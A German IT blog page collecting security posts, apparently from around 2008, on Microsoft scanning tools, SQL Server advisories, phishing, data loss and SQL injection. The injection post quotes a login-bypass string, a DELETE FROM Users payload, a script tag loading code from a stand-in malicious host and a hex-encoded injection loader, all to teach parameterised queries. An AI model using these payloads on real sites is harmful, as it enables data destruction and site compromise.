atwork.blog

news and infos about microsoft, technology, cloud and more

Microsoft Windows Malicious Software Removal Tool und OneCare safety scanner

Wollen Sie mal rasch einen PC auf Viren-Infektionen scannen? Jeden zweiten Dienstag im Monat veröffentlicht Microsoft eine aktualisierte Version des Malicious Software Removal Tools, die aktuelle Version ist demnach vom 13. Jänner. Das Tool ist von Microsoft Update, Windows Update und dem Microsoft Download Center beziehbar. Dieses Monat  sind die Stämme von Win32/Conficker und Win32/Banload hinzugekommen. Die regelmäßigen Aktualisierungen sind vor allem deswegen sehr wichtig, weil sich die Schädlinge sehr rasch verändern können: “The malware utilizes several layers of polymorphism and packing to hinder analysis and detection”. Das Tool sollte nicht als Ersatz für ein AntiVirus-Schutz verwendet werden, aber als Zusatz oder schnelle Prüfung eines nicht geschützten PCs ist es sehr brauchbar. Für Rundum-Schutz empfehlen sich Lösungen wie Microsoft Forefront oder Windows Live OneCare und natürlich die weiteren AV-Hersteller, je nach (Unternehmens-) Größe. Der Download besteht aus nur einem File mit etwa 9MB:   Die Prüfung kennt aktuell diese bösartige Software: siehe Families Cleaned by the Malicious Software Removal Tool. Nach Durchlaufen des Tools folgt eine einfache Zusammenfassung. Ebenso auch noch der Hinweis zum Windows Live OneCare safety scanner. Dieser sucht nach gefährlicher Software vor allem von Websiten (Virus und Spyware). Für Windows Vista liegt derzeit eine Beta-Version vor. Der Scanner installiert sich als AddOn (ActiveX) des Internet Explorers und ermöglicht ebenso eine rasche Überprüfung des PCs. Zum Ausprobieren folgen Sie dem Link, klicken Sie auf den Button “Protection Scan” und folgen Sie der Installationsanweisungen. Weitere Informationen zu den Tools finden sich im Microsoft Malware Protection Center im TechNet Blog. Zusammenfassend also schnelle, kostenlose und sehr einfache Möglichkeiten verdächtige PCs zu scannen. Beitrag von Toni Pohl

SQL Security - Zusammenfassung von nützlichen Links

Vor kurzem wurde in den Medien wieder auf eine kritische Sicherheitslücke im SQL Server hingewiesen, wo es zu remote code execution kommen kann. Betroffen davon sind SQL Server 2005 mit SP2, SQL 2000 mit SP4. Nicht betroffen sind SQL Server, die aktuell gepatcht sind, also SQL 2005 mit SP3 bzw. auch SQL 2008. Anbei finden Sie einige englischsprachige Links, die Sie dabei unterstützen können, Ihre SQL Server Systeme gegen Angriffe, die diese Lücke ausnützen, zu schützen: Microsoft Security Advisory (961040) Microsoft Security Advisory: Vulnerability in SQL Server could allow remote code execution Meldung im Security Response Center Blog Bitte achten Sie darauf, dass Ihre Systeme auch 2009 immer aktuell gepatcht sind! In diesem Sinne: Ein gutes neues Jahr! Beitrag von Martina Grom

Vista blockiert die Ausführung von .chm Hilfe-Dateien

Alt, aber noch immer ein oft wiederkehrendes Thema: Man lädt eine kompilierte Hilfedatei (*.chm) aus dem Internet und möchte diese öffnen. Die Datei kann u.U. nicht geöffnet bzw. nicht angezeigt werden. Wichtig dabei: Die chm-Datei sollte von einer "sicheren" (also: vertrauenswürdigen) Quelle stammen! Die Änderungen im Verhalten sind darin begründet, dass .chm-Dateien Sicherheits-Risiken darstellen können (These changes were introduced to reduce security vulnerabilities in HTML Help). Die Lösung: Im Windows-Explorer ins Kontextmenü der Datei: Und hier im Register "Allgemein" unter "Sicherheit" den Button "Zulassen" anklicken! Neuerlich öffnen und voila: Weitere Infos dazu u.a. im blog hier und in KB902225. Beitrag von Toni Pohl

Wohin mit sensiblen Daten?

Heute wurde bekannt, dass in Großbritannien "sensible Daten" abhanden gekommen sind. Diese Daten waren anscheinend auf einem USB-Stick kopiert worden und - schwupps - verlegt, verloren, gestohlen oder sind im besten Fall einfach weg. Es handelt sich dabei um Namen und Geburtsdaten aller 84-tausen Häfltinge von England und Wales und die Adressen von 33-tausend straffälligen Wiederholungstätern, so berichtet auch der ORF.Dies ist in letzter Zeit in Good Old Britain bereits mehrfach vorgekommen: Es wurden Regierungsdaten, Notebooks, Disketten und CDs in Zügen vergessen, die Daten von 25-Millionen Steuerzahlern verloren und ein paar weitere peinliche Fauxpas. Solche Fälle passieren im elektronischen Zeitalter natürlich immer und überall - oft werden derartige Mitteilungen aber kaum oder erst viel später publik. Es genügt halt nicht, sich in (Firmen-) Netzwerken nur darum zu kümmern, dass eine Firewall und Netzwerk-Security vorhanden sind. Genauso wichtig sind Schulungen und Maßnahmen, um das Bewusstsein der Mitarbeiter zu schärfen, wie mit Daten umgegangen wird! Wenn Regeln vorhanden und Mitarbeiter geschult sind, Datenschutzbeauftrage definiert sind, stellen sich folgende Fragen: Wohin mit (sensiblen) Daten? Wie sollen Daten transportiert und wie archiviert werden? Experten raten dazu, sensible Daten gar nicht zu transportieren - zumindestens nicht "sorglos". Der Vorteil von elektronischen Daten, dass diese beliebig oft kopierbar sind, sind sicherheitstechnisch gesehen ein Nachteil. Also möglichst kein Kopieren UND Transportieren auf USB-Sticks, CD´s und Bänder! Kopieren zum Zweck der Archivierung ist aber natürlich Pflicht. Diese Daten gehören dann auch nur in den Firmen-Safe oder auf einen entfernten Server gesichert oder an einem zweiten, sicheren Ort aufbewahrt. Wenn Daten schon transportiert werden, dann ist es zumindest ratsam, diese (sensible) Daten zu verschlüsseln. Der Nachteil: wenn man als Anwender im Besitz der Datenträger ist, hat man meistens auch viel Zeit und Möglichkeiten, die Daten wieder zu entschlüsseln. Wie auch die "Datenschützer" fordern, ist es beunruhigend und wohl kaum nachvollziehbar, wo eigene, persönliche Daten gespeichert sind. Genauso wenig weiß niemand, ob und wo "verlorene" Daten von fremden Personen benutzt werden. Generell gilt aber: Besser ist, sensible Daten nicht selbst zu transportieren und per VPN darauf zuzugreifen (siehe auch Reisen mit einem Notebook). Was meinen Sie dazu? Welche Arten von Daten halten Sie für sensibel?Wie transportieren und schützen Sie wichtige Daten? Welche Verschlüsselungstechnologien setzen Sie ein?Wie merken Sie sich Ihre dutzende/hunderte Passwörter?Wir freuen uns auf Ihre Kommentare mit Tipps und Feedbacks! Beitrag von Toni Pohl

Phishing? Passiert mir nicht! Mir doch nicht!

....dachte ich bisher - und so ist es auch bisher. Bisher. Denn wenn man so wie ich viel im Web unterwegs ist, viel mit Messenger arbeitet, viele E-Mails kriegt, kurz und gut, so richtig im Information Overflow treibt, kann es schon mal passieren. Sollte es aber nicht. So wie unlängst zwei lieben Kollegen von mir. Plötzlich wird im gerade offenen Messenger Fenster ein Link geschickt. Man klickt drauf, handelt es sich ja um die Person des Vertrauens. Und wundert sich ein bisschen über die Seite. Der Kollege kriegt genau den gleichen Link, da wir ja alle sooooo multi-tasking fähig sind, chatten wir ja parallel. Ich murmle noch Panama, weil ich mich über die Nutzungsbedingungen wundere, mein Gegenüber zieht daraus aber folgende Schlüsse: Freundin war in Panama auf Urlaub - Panama - Seite mit Bildern = Urlaubsbilder. Und schon ist er angemeldet, leider zu spät wird mein nächstes Murmeln gehört: das ist sicher eine Phishing Site. Tja, es hätte theoretisch ja schlimmer sein können, es waren ja "nur" die Messenger Daten. Nur mal kurz alle (dreihundertmillionen) Kennwörter ändern. Und sich etwas blöd vorkommen. Und sich wieder Mal vor Augen führen: wachsam zu bleiben. Hier noch ein paar Infos zu oben beschriebener Falle. Mich würde an dieser Stelle von unseren Lesern interessieren: wem ist es schon mal ähnlich gegangen? Beitrag von Martina Grom

Kostenloses Anti-Virus-Zeugs

Für Privat-Anwender gibt es (zum Glück) mittlerweile eine Reihe von kostenlosen Virensuch- und Virenschutz-Programmen. Jörg Klemenz hat sich die Mühe gemacht, in seinem Blog C-Ko einige davon aufzuspüren (wie zum Beispiel Avast) und diese zu beschrieben und mit Links zu versehen. Sehen Sie am besten selbst im Blog hier: http://c-ko.blogspot.com/2007/02/kostenloses-anti-virus-zeugs.html

Tool gegen SQL Injection

Seit Ende Juni gibt es eine Hilfe für Entwickler und IT-Administratoren gegen SQL Injection in Websites vom Typ classic asp und zwar den Microsoft Source Code Analyzer for SQL Injection - June 2008 CTP (siehe auch Beitrag Totgesagte leben länger - so auch SQL-Injection). Das Tool benötigt das Microsoft .Net 3.0 Framework und ist ein Command line-Utility. Nach Entpacken des Download-Pakets empfiehlt sich daher ein erster Blick in Readme.html. Um eine einzelne asp-Seite zu prüfen, wird diese einfach mit dem /Input-Parameter aufgerufen: msscasi_asp.exe /Input=C:\wwwroot\myweb\login.asp Das Ergebnis könnte dann beispielsweise so aussehen: Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation.  All rights reserved. RESULT has no typeC:\wwwroot\myweb\shopfunc.asp(600) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as THEGUID`591). Path summary:- {THEGUID}[THEGUID`591 : string_input] created on 'Parameter' (line 591)- {THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : string_input] on 'Transfer' (line 599)- {SQL, THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : $error] on 'Execute' (line 600): Lines: 591, 596, 599, 600 C:\wwwroot\myweb\shopfunc.asp(833) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).There are other instances of this error:Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).(line 843) ...etc. In dieser geprüften Seite werden also einige Meldungen ausgeworfen - Handlungsbedarf für den Entwickler. Das Tool kennt sechs Fehler: 80400, 80403, 80406, 80407, 80420 or 80421, wobei 80400-Warnungen die höchste Priorität besitzen und sofort behoben werden sollten. Wenn keine Meldungen ausgegeben werden, ist die Seite in Ordnung: msscasi_asp.exe /Input=C:\wwwroot\myweb\datefunc.asp Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation.  All rights reserved. Weitere Schritte (und wie ganze Websites geprüft werden können) finden Sie in Getting started with Microsoft Source Code Analyzer for SQL Injection. Das Tool ist somit eine einfache Hilfe für den Security-Check von ASP-Websites. Beitrag von Toni Pohl

Für IT Professionals und solche, die es werden soll(t)en: Microsoft Baseline Security Analyzer 2.1

Schon ein Monat ist er alt - aber vielen (noch) unbekannt: Der Microsoft Baseline Security Analyzer 2.1 für Windows (MBSA). MBSA ist ein einfaches, kostenfreies Tool, welches ermöglicht den Sicherheitsstatus eines Windows-PCs anhand der Sicherheitsempfehlungen von Microsoft zu ermitteln. Dabei können übliche Schwachstellen und fehlende Patches entdeckt und die Systemsicherheit verbessert werden. MBSA ist vor allem für KMUs gedacht. Der Analyzer kann mit und ohne WSUS arbeiten. Das Tool enthält ein grafisches und ein Commandline-Interface und kann auch Remote Scans ausführen (also fremde PCs prüfen). MBSA 2.1 läuft ab Windows 2000 Service Pack 3 bis hin zum neuen Windows Server 2008, als x32 oder x64bit Applikation - je nach Betriebssystem gibt es mitunter einige Einschränkungen. Was ist neu an MBSA 2.1? Die neue Version unterstützt den aktuellen Windows Update Agent client (WUA - von Microsoft Update oder WSUS-Servern installiert), ebenso ein neues grafisches Interface für Vista und Windows Server 2008, vollen 64bit-Support, vulnerability assessment check support (VA - ja, was wär das Leben ohne tolle Abkürzungen?) und aktualisierte Checks für SQL Server 2005 und Windows XP Embedded platforms. Nach der Installation (als Administrator!) erfolgt die Überprüfung in einfachen Schritten: Das Ergebnis sieht dann beispielsweise so aus: Ein leicht zu lesender Report, der die einzelnen Themen übersichtlich zusammenfasst und zu jedem Thema Hinweise zur Überprüfung, zu den ermittelten Details und teilweise auch Links zur Behebung der Schwachstelle liefert. Beim Anklicken eines Links wird der entsprechende Report im Browser geöffnet. Hier geht es zum Download und zu den wirklich ausführlichen FAQs. Ein brauchbares Tool! Wir wünschen Secure Computing! Beitrag von Toni Pohl

Forefront: On demand Webcasts

Zur Forefront Familie stehen eine Reihe von Webcasts zur Verfügung, die teilweise bereits stattgefunden haben und deshalb on Demand abrufbar sind. In der Zusammenstellung sind jedoch auch Webcasts angeführt, welche noch stattfinden werden, diese sind mit einem * gekennzeichnet. Forefront Client Security Forefront Server Security Forefront Edge Security Forefront Stirling Sicherheit Allgemein Forefront Client Security: TechNet Webcast: Forefront Client Security Series: A Technical Overview of Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366183&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 1 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366185&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 2 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366194&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security in Large Enterprises (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366204&culture=en-US TechNet Webcast: Troubleshooting Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032343644&culture=en-US TechNet Webcast: How Microsoft IT Uses Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366695&culture=en-US Forefront Server Security: TechNet Webcast: Technical Overview of Forefront Security for Exchange Server (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032348784&culture=en-US TechNet Webcast: Forefront Security for Exchange Deployment Best Practices (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377121&culture=en-US TechNet Webcast: Technical Overview of Forefront Security for SharePoint (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338141&culture=en-US TechNet Webcast: Forefront Security for SharePoint Content Filtering Drill-Down (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377096&culture=en-US TechNet Webcast: Securing SharePoint End-to-End with Microsoft Forefront (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377264&culture=en-US TechNet Webcast: Managing Exchange Server and SharePoint Protection with Forefront Server Security Management Console (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377108&culture=en-US TechNet Webcast: A Technical Introduction to Forefront Security for Communications Server (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377127&culture=en-US TechNet Webcast: Technical Overview of Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338266&culture=en-US TechNet Webcast: Take Control with Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032326211&culture=en-US TechNet Webcast: Managing Messaging and Collaboration Security with the Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032352492&culture=en-US TechNet Webcast: Maximizing the Multiple Scan Engine Advantage in Forefront Server Security Solutions (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032341210&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 13 of 24): Maintaining Anti-Spam Systems (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323323&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 14 of 24): Maintaining Antivirus (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323327&culture=en-US Forefront Edge Security: TechNet Webcast: ISA Server 2006 Technical Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334107&culture=en-US TechNet Webcast: ISA Server 2006 Firewall and Proxy Services (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334394&culture=en-US TechNet Webcast: Cool and Under-Utilized ISA 2006 Scenarios (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377117&culture=en-US TechNet Webcast: Overview of Forefront Edge Secure Access Technologies (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338274&culture=en-US Forefront Stirling: TechNet Webcast: Forefront Code Name "Stirling" Technical Overview (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377102&culture=en-US Sicherheit Allgemein: TechNet Webcast: Microsoft Malware Protection Center Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032340082&culture=en-US Comprehensive protection for your client operating system, application servers, and the network edge http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032346757&culture=en-US Microsoft Webcast: Security Series (Part 5 of 8): Protecting Data from Malicious Software (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032336307&culture=en-US TechNet Webcast: How Microsoft IT Uses Network Access Protection to Manage Network Health (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032339511&culture=en-US TechNet Webcast: How Microsoft IT Defends Against Spam, Viruses, and E-Mail Attacks (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032305763&culture=en-US TechNet Webcast: Security Features in Windows Vista (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032312729&culture=en-US Ebenso wert vorbei zu schauen: Forefront Website. Auf dieser Website werden auch gratis Testversionen der Produkte angeboten. Es stehen Evaluierungskopien (was für ein schönes eingedeutschtes Wort) für Exchange, Sharepoint, Client Security, und ISA Server zur Verfügung. Alternativ kann man an einem virtual Lab teilnehmen.   Beitrag von Martina Grom

Notebook = Koffer oder: Reisen mit einem Notebook

Mittlerweile hat fast jeder von uns sein Notebook auf Reisen dabei. Für den Business-Termin, für das Speichern der vielen Urlaubsfotos oder nur für die Kommunikation. Bei Einreise in die USA (und wahrscheinlich demnächst auch in andere Staaten) dürfen die Daten eines Notebooks durchsucht werden! Das ist schon seit längerem üblich und ist laut Entscheidung eines Berufungsgerichtes in den USA "mit dem Öffnen von Gepäckstücken gleichzusetzen". Das bedeutet, dass ein Zollbeamter verlangen kann, beispielsweise Browser-Cache und Mails anzuschauen, Dateien durchzusehen oder im schlimmsten Fall das Notebook zur weiteren Untersuchung zu konfiszieren (und erst nach Stunden wieder zurück zu kommen). Sehr oft werden Festplatten auch nach Fotos durchsucht, vor allem nach kinderpornografischem Material. Es sieht so aus, als wären die USA derzeit mehr daran interessiert, nach Fotos und Geschäftsdaten Ausschau zu halten als nach Terroristen. Nachdem die Verfahren nicht standardisiert sind, wird das Durchsuchen oft mit "security by curiosity" verglichen. Auch wenn man im Regelfall meist keine heiklen Daten mit sich führt - es kann schon unangenehm sein, wenn der eigene E-Mail-Verkehr, Urlaubsfotos oder auch Geschäftsdaten offen gelegt werden müssen. Und einem Zöllner erklären, dass die E-Mail an den Freund in Amerika über den US-Wahlkampf, Politik oder sonstigen versendeten Funstuff ironisch gemeint war... Der Rat von Experten lautet: Sensible Daten nicht verschlüsseln (denn das erweckt automatisch Verdacht), sondern diese in anderen, unscheinbaren Dateien zu verstecken, beispielsweise Inhalte an eine andere Datei anzuhängen (Alternate Data Streams). Am besten ist es, sensible Daten einfach nicht mitzuführen, sondern auf diese Remote (VPN) zuzugreifen. Siehe dazu auch die ORF Futurezone US-Flughäfen: Laptops als Datenkoffer Beitrag von Toni Pohl

Totgesagte leben länger - so auch SQL-Injection

Die guten alten Zeiten - da war alles noch einfacher. Oder doch nicht? Ich habe mal an einem größeren Shop-System programmiert - das war im Jahr 2000 - und dabei gelernt, dass man einige Dinge beachten muss: Funktionalität, Usability und ... Security. Ein SQL-Server-System ist ja eine feine Sache, aber es könnte dazu benutzt werden, um "bösen" SQL-Code abzusetzen - wenn man nicht ein paar grundlegende Dinge berücksichtigt. Die Bezeichnung "SQL-Injection" bedeutet, dass Eingaben (meist durch Webformulare oder präparierte URLs) um syntaktisch korrekte SQL-Befehle erweitert werden, sodass von Außen bösartiger Code eingeschleust werden kann, der Daten ändert oder löscht. Warum ist SQL Injection jetzt (noch) ein Thema? Es gab in den letzten Wochen und Monaten einige Mitteilungen, dass Systeme mit IIS und SQL Server durch SQL Injection verwundbar seien. Diese sind schlichtweg - falsch! Es handelt sich bei diesen Attacken nicht um Schwachstellen von Windows oder IIS oder SQL Server, sondern um Fehler von Software-Lieferanten oder Entwicklern. Damit Applikationen durch SQL Injection verwundbar sind, müssen die folgenden Voraussetzungen zutreffen: Websites und Applikationen, welche Classic ASP (oder auch PHP, od. ASPX) verwenden, die SQL Server (oder ähnliche SQL-Datenbanksysteme wie Oracle, MySQL, etc.) verwenden und SQL-Befehle ungefiltert zusammensetzen und ausführen (siehe Beispiel unten). Die Verantwortung für die Softwarelösungen liegt beim Entwickler selbst!Und hier herrscht leider immer noch viel zu wenig Focus von Software-Entwicklern im Bereich Security, denn sonst wären solche Attacken gegen Webseitensysteme nicht mehr erfolgreich! Wie funktioniert SQL-Injection? Auch darüber ist schon viel berichtet worden, hier ein einfaches Beispiel zur Funktionsweise. Angenommen, es gibt auf einer Webseite eine Login-Seite: Diese verwendet die Texteingaben ungefiltert und baut daraus einen SQL-String zusammen, welcher gegen die Datenbank abgesetzt wird: SELECT * FROM Users WHERE Username = 'max' and Password = 'geheim' Das schaut soweit ja fürs Erste funktionell aus - und als Ergebnis werden alle Datensätze mit diesem Filter geliefert - im Idealfall ein Datensatz mit dem User Max, wo sein Kennwort geheim ist. Max wird dann angemeldet und ... zurück zum Start! Ein findiger, böser Mensch kann nun folgendes versuchen: in der Annahme, dass die User-Abfrage so (oder ähnlich) funktioniert, kann er nun in die Textfelder folgendes schreiben: ' or '1'='1 und dasselbe beim Passwort. Was kommt beim Zusammensetzen des SQL-Befehls in der Login-Seite raus? SELECT * FROM Users WHERE Username = '' or '1'='1' and Password = '' or '1'='1' Die Texteingaben werden in das SQL eingesetzt und liefern somit immer WAHR. Und was liefert diese Abfrage? ALLE Benutzer aus der Users-Tabelle. Das bedeutet zum Beispiel, dass (bei einer Login-Seite) der anonyme Benutzer gleich als erster User in der Tabelle angemeldet wird. Blöd. Noch blöder: Wenn der Angreifer sich nicht damit begnügt, sondern dahinter noch ein böses SQL absetzt: 1'='1';DELETE FROM Users; Ganz schlecht. Damit wird beim Ausführen der Abfrage die ganze Users-Tabelle gelöscht. Dumm gelaufen - für den Betreiber der Website. Optimierung von SQL Injection Eine weitere Variante - diese ist ganz aktuell aus einem Logfile einer Website entnommen, die mit SQL Injection bearbeitet wurde: Statt od. zusätzlich zur Bedingung wird ein Script eingesetzt, welches aufgerufen wird, wenn die Tabelle ausgelesen und in einer Website angezeigt wird: <script src="http://www.---boeseseite---.com/b.js"></script> Und hier drinnen gehts dann mit Javascript weiter... die aufrufende Seite wird zur Umleitung oder (im besten Fall) unbrauchbar. Suchen Sie mal im Web nach "banner82.com" oder "adw95.com" - dann finden Sie ziemlich viele (auch prominente) Websites, die durch die aktuellen SQL-Injection-Angriffe "ge-hackt" wurden und diese Scripts intus haben oder hatten. Hier ein Beispiel, wie so eine infizierte Seite dann aussehen kann: Hier sind viele Attacken ausgeführt worden, sodass das Script mehrfach injiziert wurde und teilweise wieder unbrauchbar wird. Noch ein Hinweis zu banner82: Diese Attacke wird nicht ganz im Klartext injiziert, sondern kommt in etwa so daher: DECLARE @S%20VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641 ..... 6F7220 AS VARCHAR(4000)); EXEC(@S) Das SQL wird in einer Variable zusammengebastelt, lädt alle Tabellen und Spaltennamen in einer Schleife und versucht, das Script überall hineinzuschreiben und wird am Schluss mit EXECute ausgeführt. Eine weitere Steigerung: Mittlerweile ist es nicht mehr so, dass ein Hacker manuell versucht, in die Datenbank einer Website zu einzudringen, sondern die Angriffe werden automatisiert. Dazu bietet sich zum Beispiel an, ein API von Google od. einer anderen Suchmaschine zu benutzen: Suche alle Sites, wo Parameter (z.B. http://www.--eineseite--/article?id=xyz) übergeben werden.Versuche, an den Parameter ein ' anzufügen.Analysiere die Response der Seite, ob der gesendete Parameter korrektes Encoding besitzt. Wenn nein, dann ist die Website "offen" und ein Kandidat für SQL-Injection-Scripts! Schutz vor SQL Injection Die Lösung: Es gibt für alle Entwickler eine einfache Regel: All input is evil! Jede Eingabe muss vom Programm gefiltert oder kontrolliert werden. Das bedeutet: Keine SQL-Befehle mehr aus Eingabefeldern zusammensetzen. Auch schon in ADO (Classic ASP) gab es Parameter-Übergabe, natürlich auch in ASP.NET. Diese verhindert, dass Texteingaben ungültige Zeichen enthalten und somit bösartige SQL-Befehle ausführen können! Aus der Demo-Abfrage von oben wird: select TOP (1) UserID from Users where username = @username and password = @password und @username und @password werden als Parameter übergeben. In ASP.NET 2.0 (VB.NET) sieht das dann beispielsweise so aus: Dim conn As SqlConnectionDim cmd As New SqlCommandconn = New SqlConnection(ConnectionStrings("conn").ConnectionString)conn.Open()cmd = New SqlCommand(SQL, conn)cmd.CommandType = CommandType.Text ' od besser: .StoredProcedurecmd.Parameters.AddWithValue("@username", Me.txtUsername.Text)cmd.Parameters.AddWithValue("@password", Me.txtPassword.Text)UserID = cmd.ExecuteScalar()conn.Close() und schon hat SQL-Injection dank der Parameter-Übergabe keine Chance mehr. Das Ganze noch in einen Try..Catch Block, mit etwas Fehlerabsicherung versehen und man hat sauberen, sicheren Code (Hardcore-Entwickler mögen mir verzeihen - ich weiß, der Code kann effizienter formuliert werden aber das Beispiel dient nur zur Demonstration). Ziel dieses Artikels ist, das Bewußtsein zu diesem (eigentlich sehr alten) Thema zu fördern, die Funktionsweise zu demonstrieren und Entwickler anzuhalten, ihre Software sicher zu programmieren, damit keine mißbräuchliche Verwendung von öffentlich zugänglichen Webseiten möglich ist. Es gibt dazu eine Fülle von Anleitungen und Hilfen. Viel mehr zu diesem Thema und weitere Hilfestellung, wie man sich davor schützen kann, finden Sie in den folgenden Links: http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx - Microsoft´s call to action und weitere Infos: http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx - Scott Guthrie´s blog http://msdn.microsoft.com/en-us/library/ms998271.aspx - msdn: How To: Protect From SQL Injection in ASP.NET http://msdn.microsoft.com/en-us/library/bb671351.aspx - msdn: Explained - SQL Injection http://technet.microsoft.com/de-de/library/ms161953.aspx - technet: SQL Injection http://msdn.microsoft.com/en-us/library/aa224806.aspx  - Injection Protection Achja, es gibt natürlich auch zum Thema Programmieren im Internet einige weitere interessante Security-Themen: SQL Cross Site Scripting, Canonicalization Attacks (wußten Sie, wie viele Arten es gibt, eine URL anzugeben, zum Beispiel auch dezimal), Query String, Form, Cookie, HTTP Header-Manipulations und vieles mehr. Internet-Technologie ist toll, aber bietet eine Reihe von Angriffsmöglichkeiten. Bei Tauchern heißt der Abschiedsgruß "Gut Luft". Bei Entwicklern sollte es heißen "Secure coding"! ;-) Beitrag von Toni Pohl

Microsoft Patchday und Security Bulletins

Wahrscheinlich ist nur wenigen Administratoren bekannt, dass es im Microsoft TechNet eine Reihe von Informationen und Services gibt, welche über Patches, gestopfte Sicherheitslücken, Tools und Empfehlungen berichten. Das wird hiermit nachgeholt. ;-) Im Thema Sicherheit findet sich die Einstiegsseite Security Bulletin-Suche. Hier findet sich beispielsweise auch der Bulletin vom Mai 2008 - diesmal wurden drei als kritische Sicherheitslöcher und eines als mittleres Sicherheitsloch eingestuft und behoben. Empfehlenswert für System-Admins ist auch der Microsoft Security Bulletins RSS-Feed. Für Betreiber von MU, WU und WSUS finden sich in KB894199 Informationen über Änderungen dieser Dienste im Jahr 2008. Links: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx - Start http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms08-may.mspx - aktuell im Mai http://www.microsoft.com/germany/technet/sicherheit/bulletins/secrss.xml - der RSS-Feed http://support.microsoft.com/kb/894199 - MU, WU und WSUS Änderungen 2008 http://www.microsoft.com/germany/technet/sicherheit/default.mspx - Allgemeine Infos zum Them Sicherheit mit Tools zum Netzwerk-Schutz Beitrag von Toni Pohl